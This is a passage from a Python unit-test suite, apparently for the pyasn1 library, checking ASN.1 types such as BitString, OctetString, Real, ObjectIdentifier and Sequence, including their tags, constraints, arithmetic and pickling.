assert 'Boolean' in repr(univ.Boolean(1))
def testTag(self):
assert univ.Boolean().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x01)
)
def testConstraints(self):
class Boolean(univ.Boolean):
pass
try:
Boolean(2)
except error.ValueConstraintError:
pass
else:
assert 0, 'constraint fail'
class BooleanPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Boolean()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Boolean
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Boolean(True)
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == True
class BitStringTestCase(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.b = univ.BitString(
namedValues=namedval.NamedValues(('Active', 0), ('Urgent', 1))
)
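        # 'Active' names bit 0 and 'Urgent' names bit 1, so clone('Urgent') is the
        # two-bit value (0, 1) and clone('Urgent, Active') is (1, 1).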
def testBinDefault(self):
class BinDefault(univ.BitString):
defaultBinValue = '1010100110001010'
assert BinDefault() == univ.BitString(binValue='1010100110001010')
def testHexDefault(self):
class HexDefault(univ.BitString):
defaultHexValue = 'A98A'
assert HexDefault() == univ.BitString(hexValue='A98A')
def testSet(self):
assert self.b.clone('Active') == (1,)
assert self.b.clone('Urgent') == (0, 1)
assert self.b.clone('Urgent, Active') == (1, 1)
assert self.b.clone("'1010100110001010'B") == (1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0)
assert self.b.clone("'A98A'H") == (1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0)
assert self.b.clone(binValue='1010100110001010') == (1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0)
assert self.b.clone(hexValue='A98A') == (1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0)
assert self.b.clone('1010100110001010') == (1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0)
assert self.b.clone((1, 0, 1)) == (1, 0, 1)
def testStr(self):
assert str(self.b.clone('Urgent')) == '01'
def testRepr(self):
assert 'BitString' in repr(self.b.clone('Urgent,Active'))
def testTag(self):
assert univ.BitString().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x03)
)
def testLen(self):
assert len(self.b.clone("'A98A'H")) == 16
def testGetItem(self):
assert self.b.clone("'A98A'H")[0] == 1
assert self.b.clone("'A98A'H")[1] == 0
assert self.b.clone("'A98A'H")[2] == 1
if sys.version_info[:2] > (2, 4):
def testReverse(self):
assert list(reversed(univ.BitString([0, 0, 1]))) == list(univ.BitString([1, 0, 0]))
def testAsOctets(self):
assert self.b.clone(hexValue='A98A').asOctets() == ints2octs((0xa9, 0x8a)), 'testAsOctets() fails'
def testAsInts(self):
assert self.b.clone(hexValue='A98A').asNumbers() == (0xa9, 0x8a), 'testAsNumbers() fails'
def testMultipleOfEightPadding(self):
assert self.b.clone((1, 0, 1)).asNumbers() == (5,)
def testAsInteger(self):
assert self.b.clone('11000000011001').asInteger() == 12313
assert self.b.clone('1100110011011111').asInteger() == 52447
def testStaticDef(self):
class BitString(univ.BitString):
pass
assert BitString('11000000011001').asInteger() == 12313
class BitStringPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.BitString()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.BitString
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.BitString((1, 0, 1, 0))
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == (1, 0, 1, 0)
class OctetStringWithUnicodeMixIn(object):
initializer = ()
encoding = 'us-ascii'
def setUp(self):
self.pythonString = ints2octs(self.initializer).decode(self.encoding)
self.encodedPythonString = self.pythonString.encode(self.encoding)
self.numbersString = tuple(octs2ints(self.encodedPythonString))
def testInit(self):
assert univ.OctetString(self.encodedPythonString) == self.encodedPythonString, '__init__() fails'
def testInitFromAsn1(self):
assert univ.OctetString(univ.OctetString(self.encodedPythonString)) == self.encodedPythonString
assert univ.OctetString(univ.Integer(123)) == univ.OctetString('123')
def testSerialised(self):
if sys.version_info[0] < 3:
assert str(univ.OctetString(self.encodedPythonString, encoding=self.encoding)) == self.encodedPythonString, '__str__() fails'
else:
assert bytes(univ.OctetString(self.encodedPythonString, encoding=self.encoding)) == self.encodedPythonString, '__str__() fails'
def testPrintable(self):
if sys.version_info[0] < 3:
assert str(univ.OctetString(self.encodedPythonString, encoding=self.encoding)) == self.encodedPythonString, '__str__() fails'
assert unicode(univ.OctetString(self.pythonString, encoding=self.encoding)) == self.pythonString, 'unicode init fails'
else:
assert str(univ.OctetString(self.pythonString, encoding=self.encoding)) == self.pythonString, 'unicode init fails'
def testSeq(self):
assert univ.OctetString(self.encodedPythonString)[0] == self.encodedPythonString[0], '__getitem__() fails'
def testRepr(self):
assert 'abc' in repr(univ.OctetString('abc'))
def testAsOctets(self):
assert univ.OctetString(self.encodedPythonString).asOctets() == self.encodedPythonString, 'testAsOctets() fails'
def testAsInts(self):
assert univ.OctetString(self.encodedPythonString).asNumbers() == self.numbersString, 'testAsNumbers() fails'
def testAdd(self):
assert univ.OctetString(self.encodedPythonString) + self.encodedPythonString == self.encodedPythonString + self.encodedPythonString, '__add__() fails'
def testRadd(self):
assert self.encodedPythonString + univ.OctetString(self.encodedPythonString) == self.encodedPythonString + self.encodedPythonString, '__radd__() fails'
def testMul(self):
assert univ.OctetString(self.encodedPythonString) * 2 == self.encodedPythonString * 2, '__mul__() fails'
def testRmul(self):
assert 2 * univ.OctetString(self.encodedPythonString) == 2 * self.encodedPythonString, '__rmul__() fails'
def testContains(self):
s = univ.OctetString(self.encodedPythonString)
assert self.encodedPythonString in s
assert self.encodedPythonString * 2 not in s
if sys.version_info[:2] > (2, 4):
def testReverse(self):
assert list(reversed(univ.OctetString(self.encodedPythonString))) == list(reversed(self.encodedPythonString))
class OctetStringWithAsciiTestCase(OctetStringWithUnicodeMixIn, BaseTestCase):
initializer = (97, 102)
encoding = 'us-ascii'
class OctetStringWithUtf8TestCase(OctetStringWithUnicodeMixIn, BaseTestCase):
initializer = (208, 176, 208, 177, 208, 178)
encoding = 'utf-8'
class OctetStringWithUtf16TestCase(OctetStringWithUnicodeMixIn, BaseTestCase):
initializer = (4, 48, 4, 49, 4, 50)
encoding = 'utf-16-be'
if sys.version_info[0] > 2:
# Somehow comparison of UTF-32 encoded strings does not work in Py2
class OctetStringWithUtf32TestCase(OctetStringWithUnicodeMixIn, BaseTestCase):
initializer = (0, 0, 4, 48, 0, 0, 4, 49, 0, 0, 4, 50)
encoding = 'utf-32-be'
class OctetStringTestCase(BaseTestCase):
def testBinDefault(self):
class BinDefault(univ.OctetString):
defaultBinValue = '1000010111101110101111000000111011'
assert BinDefault() == univ.OctetString(binValue='1000010111101110101111000000111011')
def testHexDefault(self):
class HexDefault(univ.OctetString):
defaultHexValue = 'FA9823C43E43510DE3422'
assert HexDefault() == univ.OctetString(hexValue='FA9823C43E43510DE3422')
def testBinStr(self):
assert univ.OctetString(binValue="1000010111101110101111000000111011") == ints2octs((133, 238, 188, 14, 192)), 'bin init fails'
def testHexStr(self):
assert univ.OctetString(hexValue="FA9823C43E43510DE3422") == ints2octs((250, 152, 35, 196, 62, 67, 81, 13, 227, 66, 32)), 'hex init fails'
def testTuple(self):
assert univ.OctetString((1, 2, 3, 4, 5)) == ints2octs((1, 2, 3, 4, 5)), 'tuple init failed'
def testRepr(self):
assert 'abc' in repr(univ.OctetString('abc'))
def testEmpty(self):
try:
str(univ.OctetString())
except PyAsn1Error:
pass
else:
assert 0, 'empty OctetString() not reported'
def testTag(self):
assert univ.OctetString().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x04)
)
def testStaticDef(self):
class OctetString(univ.OctetString):
pass
assert OctetString(hexValue="FA9823C43E43510DE3422") == ints2octs((250, 152, 35, 196, 62, 67, 81, 13, 227, 66, 32))
class OctetStringPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.BitString()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.BitString
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.BitString((1, 0, 1, 0))
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == (1, 0, 1, 0)
class Null(BaseTestCase):
def testInit(self):
assert not univ.Null().isValue
assert univ.Null(0) == str2octs('')
assert univ.Null(False) == str2octs('')
assert univ.Null('') == str2octs('')
assert univ.Null(None) == str2octs('')
try:
assert univ.Null(True)
except PyAsn1Error:
pass
try:
assert univ.Null('xxx')
except PyAsn1Error:
pass
def testStr(self):
assert str(univ.Null('')) == '', 'str() fails'
def testRepr(self):
assert 'Null' in repr(univ.Null(''))
def testTag(self):
assert univ.Null().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x05)
)
def testConstraints(self):
try:
univ.Null(2)
except error.ValueConstraintError:
pass
else:
assert 0, 'constraint fail'
def testStaticDef(self):
class Null(univ.Null):
pass
assert not Null('')
class NullPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Null()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Null
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Null('')
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert not new_asn1
class RealTestCase(BaseTestCase):
def testFloat4BinEnc(self):
assert univ.Real((0.25, 2, 3)) == 2.0, 'float initializer for binary encoding fails'
def testStr(self):
assert str(univ.Real(1.0)) == '1.0', 'str() fails'
def testRepr(self):
assert 'Real' in repr(univ.Real(-4.1))
assert 'Real' in repr(univ.Real(-4.1))
assert 'inf' in repr(univ.Real('inf'))
assert '-inf' in repr(univ.Real('-inf'))
def testAdd(self):
assert univ.Real(-4.1) + 1.4 == -2.7, '__add__() fails'
def testRadd(self):
assert 4 + univ.Real(0.5) == 4.5, '__radd__() fails'
def testSub(self):
assert univ.Real(3.9) - 1.7 == 2.2, '__sub__() fails'
def testRsub(self):
assert 6.1 - univ.Real(0.1) == 6, '__rsub__() fails'
def testMul(self):
assert univ.Real(3.0) * -3 == -9, '__mul__() fails'
def testRmul(self):
assert 2 * univ.Real(3.0) == 6, '__rmul__() fails'
def testDiv(self):
assert univ.Real(3.0) / 2 == 1.5, '__div__() fails'
def testRdiv(self):
assert 6 / univ.Real(3.0) == 2, '__rdiv__() fails'
def testMod(self):
assert univ.Real(3.0) % 2 == 1, '__mod__() fails'
def testRmod(self):
assert 4 % univ.Real(3.0) == 1, '__rmod__() fails'
def testPow(self):
assert univ.Real(3.0) ** 2 == 9, '__pow__() fails'
def testRpow(self):
assert 2 ** univ.Real(2.0) == 4, '__rpow__() fails'
def testInt(self):
assert int(univ.Real(3.0)) == 3, '__int__() fails'
def testLong(self):
assert int(univ.Real(8.0)) == 8, '__long__() fails'
def testFloat(self):
assert float(univ.Real(4.0)) == 4.0, '__float__() fails'
def testPrettyIn(self):
assert univ.Real((3, 10, 0)) == 3, 'prettyIn() fails'
# infinite float values
def testStrInf(self):
assert str(univ.Real('inf')) == 'inf', 'str() fails'
def testAddInf(self):
assert univ.Real('inf') + 1 == float('inf'), '__add__() fails'
def testRaddInf(self):
assert 1 + univ.Real('inf') == float('inf'), '__radd__() fails'
def testIntInf(self):
try:
assert int(univ.Real('inf'))
except OverflowError:
pass
else:
assert 0, '__int__() fails'
def testLongInf(self):
try:
assert int(univ.Real('inf'))
except OverflowError:
pass
else:
assert 0, '__long__() fails'
assert int(univ.Real(8.0)) == 8, '__long__() fails'
def testFloatInf(self):
assert float(univ.Real('-inf')) == float('-inf'), '__float__() fails'
def testPrettyInInf(self):
assert univ.Real(float('inf')) == float('inf'), 'prettyIn() fails'
def testPlusInf(self):
assert univ.Real('inf').isPlusInf, 'isPlusInfinity failed'
def testMinusInf(self):
assert univ.Real('-inf').isMinusInf, 'isMinusInfinity failed'
def testPos(self):
assert +univ.Real(1.0) == 1.0, '__pos__() fails'
def testNeg(self):
assert -univ.Real(1.0) == -1.0, '__neg__() fails'
def testRound(self):
assert round(univ.Real(1.123), 2) == 1.12, '__round__() fails'
def testFloor(self):
assert math.floor(univ.Real(1.6)) == 1.0, '__floor__() fails'
def testCeil(self):
assert math.ceil(univ.Real(1.2)) == 2.0, '__ceil__() fails'
if sys.version_info[0:2] > (2, 5):
def testTrunc(self):
assert math.trunc(univ.Real(1.1)) == 1.0, '__trunc__() fails'
def testTag(self):
assert univ.Real().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x09)
)
def testStaticDef(self):
class Real(univ.Real):
pass
assert Real(1.0) == 1.0
class RealPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.Real()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.Real
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.Real((1, 10, 3))
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == 1000
class ObjectIdentifier(BaseTestCase):
def testStr(self):
assert str(univ.ObjectIdentifier((1, 3, 6))) == '1.3.6', 'str() fails'
def testRepr(self):
assert '1.3.6' in repr(univ.ObjectIdentifier('1.3.6'))
def testEq(self):
assert univ.ObjectIdentifier((1, 3, 6)) == (1, 3, 6), '__cmp__() fails'
def testAdd(self):
assert univ.ObjectIdentifier((1, 3)) + (6,) == (1, 3, 6), '__add__() fails'
def testRadd(self):
assert (1,) + univ.ObjectIdentifier((3, 6)) == (1, 3, 6), '__radd__() fails'
def testLen(self):
assert len(univ.ObjectIdentifier((1, 3))) == 2, '__len__() fails'
def testPrefix(self):
o = univ.ObjectIdentifier('1.3.6')
assert o.isPrefixOf((1, 3, 6)), 'isPrefixOf() fails'
assert o.isPrefixOf((1, 3, 6, 1)), 'isPrefixOf() fails'
assert not o.isPrefixOf((1, 3)), 'isPrefixOf() fails'
def testInput1(self):
assert univ.ObjectIdentifier('1.3.6') == (1, 3, 6), 'prettyIn() fails'
def testInput2(self):
assert univ.ObjectIdentifier((1, 3, 6)) == (1, 3, 6), 'prettyIn() fails'
def testInput3(self):
assert univ.ObjectIdentifier(univ.ObjectIdentifier('1.3') + (6,)) == (1, 3, 6), 'prettyIn() fails'
def testUnicode(self):
s = '1.3.6'
if sys.version_info[0] < 3:
s = s.decode()
assert univ.ObjectIdentifier(s) == (1, 3, 6), 'unicode init fails'
def testTag(self):
assert univ.ObjectIdentifier().tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 0x06)
)
def testContains(self):
s = univ.ObjectIdentifier('1.3.6.1234.99999')
assert 1234 in s
assert 4321 not in s
def testStaticDef(self):
class ObjectIdentifier(univ.ObjectIdentifier):
pass
assert str(ObjectIdentifier((1, 3, 6))) == '1.3.6'
class ObjectIdentifierPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.ObjectIdentifier()
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.ObjectIdentifier
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.ObjectIdentifier('2.3.1.1.2')
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1 == (2, 3, 1, 1, 2)
class SequenceOf(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.s1 = univ.SequenceOf(
componentType=univ.OctetString('')
)
self.s2 = self.s1.clone()
def testRepr(self):
assert 'a' in repr(self.s1.clone().setComponents('a', 'b'))
def testTag(self):
assert self.s1.tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatConstructed, 0x10)
), 'wrong tagSet'
def testSeq(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
assert self.s1[0] == str2octs('abc'), 'set by idx fails'
self.s1[0] = 'cba'
assert self.s1[0] == str2octs('cba'), 'set by idx fails'
def testCmp(self):
self.s1.clear()
self.s1.setComponentByPosition(0, 'abc')
self.s2.clear()
self.s2.setComponentByPosition(0, univ.OctetString('abc'))
assert self.s1 == self.s2, '__cmp__() fails'
def testSubtypeSpec(self):
s = self.s1.clone(subtypeSpec=constraint.ConstraintsUnion(
constraint.SingleValueConstraint(str2octs('abc'))
))
try:
s.setComponentByPosition(0, univ.OctetString('abc'))
except PyAsn1Error:
assert 0, 'constraint fails'
try:
s.setComponentByPosition(1, univ.OctetString('Abc'))
except PyAsn1Error:
try:
s.setComponentByPosition(1, univ.OctetString('Abc'),
verifyConstraints=False)
except PyAsn1Error:
                assert 0, 'constraint fails with verifyConstraints=False'
else:
assert 0, 'constraint fails'
def testComponentTagsMatching(self):
s = self.s1.clone()
s.strictConstraints = True # This requires types equality
o = univ.OctetString('abc').subtype(explicitTag=tag.Tag(tag.tagClassPrivate, tag.tagFormatSimple, 12))
try:
s.setComponentByPosition(0, o)
except PyAsn1Error:
pass
else:
assert 0, 'inner supertype tag allowed'
def testComponentConstraintsMatching(self):
s = self.s1.clone()
o = univ.OctetString().subtype(
subtypeSpec=constraint.ConstraintsUnion(constraint.SingleValueConstraint(str2octs('cba'))))
s.strictConstraints = True # This requires types equality
try:
s.setComponentByPosition(0, o.clone('cba'))
except PyAsn1Error:
pass
else:
assert 0, 'inner supertype constraint allowed'
s.strictConstraints = False # This requires subtype relationships
try:
s.setComponentByPosition(0, o.clone('cba'))
except PyAsn1Error:
assert 0, 'inner supertype constraint disallowed'
else:
pass
def testSizeSpec(self):
s = self.s1.clone(sizeSpec=constraint.ConstraintsUnion(
constraint.ValueSizeConstraint(1, 1)
))
s.setComponentByPosition(0, univ.OctetString('abc'))
try:
s.verifySizeSpec()
except PyAsn1Error:
assert 0, 'size spec fails'
s.setComponentByPosition(1, univ.OctetString('abc'))
try:
s.verifySizeSpec()
except PyAsn1Error:
pass
else:
assert 0, 'size spec fails'
def testGetComponentTagMap(self):
assert self.s1.componentType.tagMap.presentTypes == {
univ.OctetString.tagSet: univ.OctetString('')
}
def testSubtype(self):
self.s1.clear()
assert self.s1.subtype(
implicitTag=tag.Tag(tag.tagClassPrivate, tag.tagFormatSimple, 2),
subtypeSpec=constraint.SingleValueConstraint(1, 3),
sizeSpec=constraint.ValueSizeConstraint(0, 1)
) == self.s1.clone(
tagSet=tag.TagSet(tag.Tag(tag.tagClassPrivate,
tag.tagFormatSimple, 2)),
subtypeSpec=constraint.ConstraintsIntersection(constraint.SingleValueConstraint(1, 3)),
sizeSpec=constraint.ValueSizeConstraint(0, 1)
)
def testClone(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
s = self.s1.clone()
assert len(s) == 0
s = self.s1.clone(cloneValueFlag=1)
assert len(s) == 1
assert s.getComponentByPosition(0) == self.s1.getComponentByPosition(0)
def testSetComponents(self):
assert self.s1.clone().setComponents('abc', 'def') == \
self.s1.setComponentByPosition(0, 'abc').setComponentByPosition(1, 'def')
def testGetItem(self):
s = self.s1.clone()
s.append('xxx')
assert s[0]
try:
s[2]
except IndexError:
pass
else:
assert False, 'IndexError not raised'
        # this is a deviation from the standard sequence protocol
assert not s[1]
def testSetItem(self):
s = self.s1.clone()
s.append('xxx')
try:
s[2] = 'xxx'
except IndexError:
pass
else:
assert False, 'IndexError not raised'
def testAppend(self):
self.s1.clear()
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
assert len(self.s1) == 1
self.s1.append('def')
assert len(self.s1) == 2
assert list(self.s1) == [str2octs(x) for x in ['abc', 'def']]
def testExtend(self):
self.s1.clear()
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
assert len(self.s1) == 1
self.s1.extend(['def', 'ghi'])
assert len(self.s1) == 3
assert list(self.s1) == [str2octs(x) for x in ['abc', 'def', 'ghi']]
def testCount(self):
self.s1.clear()
for x in ['abc', 'def', 'abc']:
self.s1.append(x)
assert self.s1.count(str2octs('abc')) == 2
assert self.s1.count(str2octs('def')) == 1
assert self.s1.count(str2octs('ghi')) == 0
def testIndex(self):
self.s1.clear()
for x in ['abc', 'def', 'abc']:
self.s1.append(x)
assert self.s1.index(str2octs('abc')) == 0
assert self.s1.index(str2octs('def')) == 1
assert self.s1.index(str2octs('abc'), 1) == 2
def testSort(self):
self.s1.clear()
self.s1[0] = 'b'
self.s1[1] = 'a'
assert list(self.s1) == [str2octs('b'), str2octs('a')]
self.s1.sort()
assert list(self.s1) == [str2octs('a'), str2octs('b')]
def testStaticDef(self):
class SequenceOf(univ.SequenceOf):
componentType = univ.OctetString('')
s = SequenceOf()
s[0] = 'abc'
assert len(s) == 1
assert s == [str2octs('abc')]
def testLegacyInitializer(self):
n = univ.SequenceOf(
componentType=univ.OctetString()
)
o = univ.SequenceOf(
univ.OctetString() # this is the old way
)
assert n.isSameTypeWith(o) and o.isSameTypeWith(n)
n[0] = 'fox'
o[0] = 'fox'
assert n == o
def testGetComponentWithDefault(self):
class SequenceOf(univ.SequenceOf):
componentType = univ.OctetString()
s = SequenceOf()
assert s.getComponentByPosition(0, default=None, instantiate=False) is None
assert s.getComponentByPosition(0, default=None) is None
s[0] = 'test'
assert s.getComponentByPosition(0, default=None) is not None
assert s.getComponentByPosition(0, default=None) == str2octs('test')
s.clear()
assert s.getComponentByPosition(0, default=None) is None
def testGetComponentNoInstantiation(self):
class SequenceOf(univ.SequenceOf):
componentType = univ.OctetString()
s = SequenceOf()
assert s.getComponentByPosition(0, instantiate=False) is univ.noValue
s[0] = 'test'
assert s.getComponentByPosition(0, instantiate=False) is not univ.noValue
assert s.getComponentByPosition(0, instantiate=False) == str2octs('test')
s.clear()
assert s.getComponentByPosition(0, instantiate=False) is univ.noValue
class SequenceOfPicklingTestCase(unittest.TestCase):
def testSchemaPickling(self):
old_asn1 = univ.SequenceOf(componentType=univ.OctetString())
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert type(new_asn1) == univ.SequenceOf
assert old_asn1.isSameTypeWith(new_asn1)
def testValuePickling(self):
old_asn1 = univ.SequenceOf(componentType=univ.OctetString())
old_asn1[0] = 'test'
serialised = pickle.dumps(old_asn1)
assert serialised
new_asn1 = pickle.loads(serialised)
assert new_asn1
assert new_asn1 == [str2octs('test')]
class Sequence(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.s1 = univ.Sequence(
componentType=namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('nick', univ.OctetString('')),
namedtype.DefaultedNamedType('age', univ.Integer(34))
)
)
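        # Schema: 'name' is mandatory, 'nick' is optional, and 'age' falls back to
        # the default value 34 when it is not explicitly set.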
def testRepr(self):
assert 'name' in repr(self.s1.clone().setComponents('a', 'b'))
def testTag(self):
assert self.s1.tagSet == tag.TagSet(
(),
tag.Tag(tag.tagClassUniversal, tag.tagFormatConstructed, 0x10)
), 'wrong tagSet'
def testById(self):
self.s1.setComponentByName('name', univ.OctetString('abc'))
assert self.s1.getComponentByName('name') == str2octs('abc'), 'set by name fails'
def testByKey(self):
self.s1['name'] = 'abc'
assert self.s1['name'] == str2octs('abc'), 'set by key fails'
def testContains(self):
assert 'name' in self.s1
assert '<missing>' not in self.s1
def testGetNearPosition(self):
assert self.s1.componentType.getTagMapNearPosition(1).presentTypes == {
univ.OctetString.tagSet: univ.OctetString(''),
univ.Integer.tagSet: univ.Integer(34)
}
assert self.s1.componentType.getPositionNearType(
univ.OctetString.tagSet, 1
) == 1
def testSetDefaultComponents(self):
self.s1.clear()
self.s1.setComponentByPosition(0, univ.OctetString('Ping'))
self.s1.setComponentByPosition(1, univ.OctetString('Pong'))
assert self.s1.getComponentByPosition(2) == 34
def testClone(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
self.s1.setComponentByPosition(1, univ.OctetString('def'))
self.s1.setComponentByPosition(2, univ.Integer(123))
s = self.s1.clone()
assert s.getComponentByPosition(0) != self.s1.getComponentByPosition(0)
assert s.getComponentByPosition(1) != self.s1.getComponentByPosition(1)
assert s.getComponentByPosition(2) != self.s1.getComponentByPosition(2)
s = self.s1.clone(cloneValueFlag=1)
assert s.getComponentByPosition(0) == self.s1.getComponentByPosition(0)
assert s.getComponentByPosition(1) == self.s1.getComponentByPosition(1)
assert s.getComponentByPosition(2) == self.s1.getComponentByPosition(2)
def testComponentTagsMatching(self):
s = self.s1.clone()
s.strictConstraints = True # This requires types equality
o = univ.OctetString('abc').subtype(explicitTag=tag.Tag(tag.tagClassPrivate, tag.tagFormatSimple, 12))
try:
s.setComponentByName('name', o)
except PyAsn1Error:
pass
else:
assert 0, 'inner supertype tag allowed'
def testComponentConstraintsMatching(self):
s = self.s1.clone()
o = univ.OctetString().subtype(
subtypeSpec=constraint.ConstraintsUnion(constraint.SingleValueConstraint(str2octs('cba'))))
s.strictConstraints = True # This requires types equality
try:
s.setComponentByName('name', o.clone('cba'))
except PyAsn1Error:
pass
else:
assert 0, 'inner supertype constraint allowed'
s.strictConstraints = False # This requires subtype relationships
try:
s.setComponentByName('name', o.clone('cba'))
except PyAsn1Error:
assert 0, 'inner supertype constraint disallowed'
else:
pass
def testSetComponents(self):
assert self.s1.clone().setComponents(name='a', nick='b', age=1) == \
self.s1.setComponentByPosition(0, 'a').setComponentByPosition(1, 'b').setComponentByPosition(2, 1)
def testSetToDefault(self):
s = self.s1.clone()
s.setComponentByPosition(0, univ.noValue)
s[2] = univ.noValue
assert s[0] == univ.OctetString('')
assert s[2] == univ.Integer(34)
def testGetItem(self):
s = self.s1.clone()
s['name'] = 'xxx'
assert s['name']
assert s[0]
try:
s['xxx']
except KeyError:
pass
else:
assert False, 'KeyError not raised'
try:
s[100]
except IndexError:
pass
else:
assert False, 'IndexError not raised'
def testSetItem(self):
s = self.s1.clone()
s['name'] = 'xxx'
try:
s['xxx'] = 'xxx'
except KeyError:
pass
else:
assert False, 'KeyError not raised'
try:
s[100] = 'xxx'
except IndexError:
pass
else:
assert False, 'IndexError not raised'
def testIter(self):
assert list(self.s1) == ['name', 'nick', 'age']
def testKeys(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
self.s1.setComponentByPosition(1, univ.OctetString('def'))
self.s1.setComponentByPosition(2, univ.Integer(123))
assert list(self.s1.keys()) == ['name', 'nick', 'age']
def testValues(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
self.s1.setComponentByPosition(1, univ.OctetString('def'))
self.s1.setComponentByPosition(2, univ.Integer(123))
assert list(self.s1.values()) == [str2octs('abc'), str2octs('def'), 123]
def testItems(self):
self.s1.setComponentByPosition(0, univ.OctetString('abc'))
self.s1.setComponentByPosition(1, univ.OctetString('def'))
self.s1.setComponentByPosition(2, univ.Integer(123))
assert list(self.s1.items()) == [(x[0], str2octs(x[1])) for x in [('name', 'abc'), ('nick', 'def')]] + [('age', 123)]
def testUpdate(self):
self.s1.clear()
assert list(self.s1.values()) == [str2octs(''), str2octs(''), 34]
self.s1.update(**{'name': 'abc', 'nick': 'def', 'age': 123})
assert list(self.s1.items()) == [(x[0], str2octs(x[1])) for x in [('name', 'abc'), ('nick', 'def')]] + [('age', 123)]
self.s1.update(('name', 'ABC'))
assert list(self.s1.items()) == [(x[0], str2octs(x[1])) for x in [('name', 'ABC'), ('nick', 'def')]] + [('age', 123)]
self.s1.update(name='CBA')
assert list(self.s1.items()) == [(x[0], str2octs(x[1])) for x in [('name', 'CBA'), ('nick', 'def')]] + [('age', 123)]
def testStaticDef(self):
class Sequence(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('nick', univ.OctetString('')),
namedtype.DefaultedNamedType('age', univ.Integer(34))
)
s = Sequence()
s['name'] = 'abc'
assert s['name'] == str2octs('abc')
def testGetComponentWithDefault(self):
class Sequence(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('nick', univ.OctetString()),
)
s = Sequence()
assert s[0] == str2octs('')
assert s.getComponentByPosition(1, default=None, instantiate=False) is None
assert s.getComponentByName('nick', default=None) is None
s[1] = 'test'
assert s.getComponentByPosition(1, default=None) is not None
assert s.getComponentByPosition(1, default=None) == str2octs('test')
s.clear()
assert s.getComponentByPosition(1, default=None) is None
def testGetComponentNoInstantiation(self):
class Sequence(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('name', univ.OctetString('')),
namedtype.OptionalNamedType('nick', univ.OctetString()),
)
s = Sequence()
assert s[0] == str2octs('')
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
assert s.getComponentByName('nick', instantiate=False) is univ.noValue
s[1] = 'test'
assert s.getComponentByPosition(1, instantiate=False) is not univ.noValue
assert s.getComponentByPosition(1, instantiate=False) == str2octs('test')
s.clear()
assert s.getComponentByPosition(1, instantiate=False) is univ.noValue
class SequenceWithoutSchema(BaseTestCase):
def testGetItem(self):
s = univ.Sequence()
